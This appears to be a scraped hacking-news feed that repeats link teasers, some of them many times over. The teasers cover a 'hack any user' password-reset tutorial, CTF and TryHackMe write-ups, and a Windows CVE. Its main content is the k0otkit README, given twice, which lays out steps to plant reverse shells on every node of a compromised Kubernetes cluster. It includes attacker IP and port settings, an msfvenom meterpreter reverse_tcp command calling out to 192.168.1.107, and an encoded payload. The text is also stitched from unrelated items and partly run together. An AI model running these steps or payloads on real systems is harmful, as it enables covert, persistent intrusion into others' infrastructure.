Reset password vulnerability
In this tutorial you will learn how you can hack any users in your vulnerable website without having their password to login.Continue reading on Medium »
Read more...
In this tutorial you will learn how you can hack any users in your vulnerable website without having their password to login.Continue reading on Medium »
Read more...
Reset password vulnerability
https://medium.com/@arshiadev/reset-password-vulnerability-618c14e9fb20?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@arshiadev/reset-password-vulnerability-618c14e9fb20?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Reset password vulnerability
In this tutorial you will learn how you can hack any users in your vulnerable website without having their password to login.
In this tutorial you will learn how you can hack any users in your vulnerable website without having their password to login.Continue reading on Medium » (https://medium.com/@arshiadev/reset-password-vulnerability-618c14e9fb20?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Reset password vulnerability
In this tutorial you will learn how you can hack any users in your vulnerable website without having their password to login.
HTB Business CTF 2022: Dirty Money
https://www.reddit.com/r/redteamsec/comments/vykk1z/htb_business_ctf_2022_dirty_money/
submitted by /u/cybersocdm (https://www.reddit.com/user/cybersocdm)
[link] (https://www.reddit.com/user/cybersocdm/comments/vyjpz4/htb_business_ctf_2022_dirty_money/) [comments] (https://www.reddit.com/r/redteamsec/comments/vykk1z/htb_business_ctf_2022_dirty_money/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/vykk1z/htb_business_ctf_2022_dirty_money/
submitted by /u/cybersocdm (https://www.reddit.com/user/cybersocdm)
[link] (https://www.reddit.com/user/cybersocdm/comments/vyjpz4/htb_business_ctf_2022_dirty_money/) [comments] (https://www.reddit.com/r/redteamsec/comments/vykk1z/htb_business_ctf_2022_dirty_money/)
___________________________
@hacking_Attack
@Hacking_Video
Reddit
From the redteamsec community on Reddit: HTB Business CTF 2022: Dirty Money
Posted by cybersocdm - 4 votes and no comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Encryption, why our phones should be encrypted.
Technology has invented many ways today to keep secrets safe. Often when a discussion related to encryption comes up people tend to say…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Encryption, why our phones should be encrypted.
Technology has invented many ways today to keep secrets safe. Often when a discussion related to encryption comes up people tend to say…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Encryption, why our phones should be encrypted.
Technology has invented many ways today to keep secrets safe. Often when a discussion related to encryption comes up people tend to say…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
DCG 201 Hybrid Meet Up — July 2022 — Rogue 0ne: A 2600 Story
https://cdn-images-1.medium.com/max/802/0*gqntRMl66yRPAg_U.png
Date: July 15th, Friday
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
DCG 201 Hybrid Meet Up — July 2022 — Rogue 0ne: A 2600 Story
https://cdn-images-1.medium.com/max/802/0*gqntRMl66yRPAg_U.png
Date: July 15th, Friday
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
DCG 201 Hybrid Meet Up — July 2022 — Rogue 0ne: A 2600 Story
Date: July 15th, Friday
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe Vulnversity Room
https://cdn-images-1.medium.com/max/800/0*5ECu_W2EXxKMQ-c7.png
Room: https://tryhackme.com/room/vulnversity
Learn about active recon, web app attacks and privilege escalation.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe Vulnversity Room
https://cdn-images-1.medium.com/max/800/0*5ECu_W2EXxKMQ-c7.png
Room: https://tryhackme.com/room/vulnversity
Learn about active recon, web app attacks and privilege escalation.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe Vulnversity Room
Room: https://tryhackme.com/room/vulnversity
Learn about active recon, web app attacks and privilege escalation.
Learn about active recon, web app attacks and privilege escalation.
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
It's hard to belive that there were so many exposed open source server(RunDeck, Jenkins) without any authentication process. It's serious security problem that could access just by open source intelligence.
https://external-preview.redd.it/kSBMwddyRJnyHJNgrZZ0a3rKuH1W8paeJjL-22f39cc.jpg?width=640&crop=smart&auto=webp&s=652db4262aae08c02cb21cea97e16ba980a34015 submitted by /u/Late_Ice_9288
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
It's hard to belive that there were so many exposed open source server(RunDeck, Jenkins) without any authentication process. It's serious security problem that could access just by open source intelligence.
https://external-preview.redd.it/kSBMwddyRJnyHJNgrZZ0a3rKuH1W8paeJjL-22f39cc.jpg?width=640&crop=smart&auto=webp&s=652db4262aae08c02cb21cea97e16ba980a34015 submitted by /u/Late_Ice_9288
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
It's hard to belive that there were so many exposed open source...
Posted in r/hacking by u/Late_Ice_9288 • 1 point and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
CVE-2022-22047: Windows CSRSS Elevation of Privilege 0-day Vulnerability
https://external-preview.redd.it/CHUalu1s9vWd4Q6d53snnM6QvafP9IqBqqNlvov0CUw.jpg?width=640&crop=smart&auto=webp&s=afc654f2b164f16a2c770fa5d15a2c59bd53a5e7 submitted by /u/Late_Ice_9288
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
CVE-2022-22047: Windows CSRSS Elevation of Privilege 0-day Vulnerability
https://external-preview.redd.it/CHUalu1s9vWd4Q6d53snnM6QvafP9IqBqqNlvov0CUw.jpg?width=640&crop=smart&auto=webp&s=afc654f2b164f16a2c770fa5d15a2c59bd53a5e7 submitted by /u/Late_Ice_9288
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
CVE-2022-22047: Windows CSRSS Elevation of Privilege 0-day...
Posted in r/hacking by u/Late_Ice_9288 • 1 point and 0 comments
Beginners Guide to Bug Bounty Hunting
https://medium.com/@dajon/beginners-guide-to-bug-bounty-hunting-a0ae4b795a1b?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@dajon/beginners-guide-to-bug-bounty-hunting-a0ae4b795a1b?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Beginners Guide to Bug Bounty
This guide will give you an idea on how to start out in bug bounties if you’re new to the topic.
This guide will give you an idea on how to start out in bug bounties if you’re new to the topic.Continue reading on Medium » (https://medium.com/@dajon/beginners-guide-to-bug-bounty-hunting-a0ae4b795a1b?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Beginners Guide to Bug Bounty
This guide will give you an idea on how to start out in bug bounties if you’re new to the topic.
Beginners Guide to Bug Bounty
This guide will give you an idea on how to start out in bug bounties if you’re new to the topic.Continue reading on Medium »
Read more...
This guide will give you an idea on how to start out in bug bounties if you’re new to the topic.Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
K0Otkit : Universal Post-Penetration Technique Which Could Be Used In Penetrations Against Kubernetes Clusters
k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters.
With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell).
k0otkit is the combination of Kubernetes and rootkit.
Prerequisite:
k0otkit is a post-penetration tool, so you have to firstly conquer a cluster, somehow manage to escape from the container and get the root privilege of the master node (to be exact, you should get the admin privilege of the target Kubernetes).
Scenario:
* After Web penetration, you get a shell of the target.
* If necessary, you manage to escalate the privilege and make it.
* You find the target environment is a container (Pod) in a Kubernetes cluster.
* You manage to escape from the container and make it (with CVE-2016-5195, CVE-2019-5736, docker.sock or other techniques).
* You get a root shell of the master node and are able to instruct the cluster with
* Now you want to control all the nodes in the cluster as quickly as possible. Here comes k0otkit!
k0otkit is detailed in k0otkit: Hack K8s in a K8s Way. UsageMake sure you have got the root shell on the master node of the target Kubernetes. (You can also utilize k0otkit if you have the admin privilege of the target Kubernetes, though you might need to modify the
Make sure you have installed Metasploit on your attacker host (
Deploy k0otkit
Clone this repository:
git clone https://github.com/brant-ruan/k0otkit
cd k0otkit/
chmod +x ./*.sh
Replace the attacker’s IP and port in
ATTACKER_IP=192.168.1.107
ATTACKER_PORT=4444
Generate k0otkit
./pre_exp.sh
./handle_multi_reverse_shell.sh
Once the handler is ready, copy the content of
Wait a moment and enjoy reverse shells from all nodes https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png
P.S. It is not limited how many Kubernetes clusters you manipulate with k0otkit.
Interact with Shells
After the successful deployment of k0otkit, you can interact with any reverse shell as you want: Features* utilize K8s resources and features (hack K8s in a K8s way)
* dynamic container injection
* communication encryption (thanks to Meterpreter)
* fileless ExampleGenerate k0otkit:
kali@kali:~/k0otkit$ ./pre_exp.sh
* ATTACKER_IP=192.168.1.107
* ATTACKER_PORT=4444
* TEMP_MRT=mrt
* msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.107 -f elf -o mrt
++ xxd -p mrt
++ tr -d ‘\n’
++ base64 -w 0
* PAYLOAD=N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
* sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTA[...]
___________________________
@hacking_Attack
@Hacking_Video
K0Otkit : Universal Post-Penetration Technique Which Could Be Used In Penetrations Against Kubernetes Clusters
k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters.
With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell).
k0otkit is the combination of Kubernetes and rootkit.
Prerequisite:
k0otkit is a post-penetration tool, so you have to firstly conquer a cluster, somehow manage to escape from the container and get the root privilege of the master node (to be exact, you should get the admin privilege of the target Kubernetes).
Scenario:
* After Web penetration, you get a shell of the target.
* If necessary, you manage to escalate the privilege and make it.
* You find the target environment is a container (Pod) in a Kubernetes cluster.
* You manage to escape from the container and make it (with CVE-2016-5195, CVE-2019-5736, docker.sock or other techniques).
* You get a root shell of the master node and are able to instruct the cluster with
kubectlon the master node as admin.* Now you want to control all the nodes in the cluster as quickly as possible. Here comes k0otkit!
k0otkit is detailed in k0otkit: Hack K8s in a K8s Way. UsageMake sure you have got the root shell on the master node of the target Kubernetes. (You can also utilize k0otkit if you have the admin privilege of the target Kubernetes, though you might need to modify the
kubectlcommand in k0otkit_template.shto use the token or certification.)Make sure you have installed Metasploit on your attacker host (
msfvenom and msfconsoleshould be available).Deploy k0otkit
Clone this repository:
git clone https://github.com/brant-ruan/k0otkit
cd k0otkit/
chmod +x ./*.sh
Replace the attacker’s IP and port in
pre_exp.shwith your own IP and port:ATTACKER_IP=192.168.1.107
ATTACKER_PORT=4444
Generate k0otkit
./pre_exp.sh
k0otkit.shwill be generated. Then run the reverse shell handler:./handle_multi_reverse_shell.sh
Once the handler is ready, copy the content of
k0otkit.shand paste it into your shell on the master node of the target Kubernetes, then press to execute it.Wait a moment and enjoy reverse shells from all nodes https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png
P.S. It is not limited how many Kubernetes clusters you manipulate with k0otkit.
Interact with Shells
After the successful deployment of k0otkit, you can interact with any reverse shell as you want: Features* utilize K8s resources and features (hack K8s in a K8s way)
* dynamic container injection
* communication encryption (thanks to Meterpreter)
* fileless ExampleGenerate k0otkit:
kali@kali:~/k0otkit$ ./pre_exp.sh
* ATTACKER_IP=192.168.1.107
* ATTACKER_PORT=4444
* TEMP_MRT=mrt
* msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.107 -f elf -o mrt
++ xxd -p mrt
++ tr -d ‘\n’
++ base64 -w 0
* PAYLOAD=N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
* sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTA[...]
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
K0Otkit : Universal Post-Penetration Technique Which Could Be Used
k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters.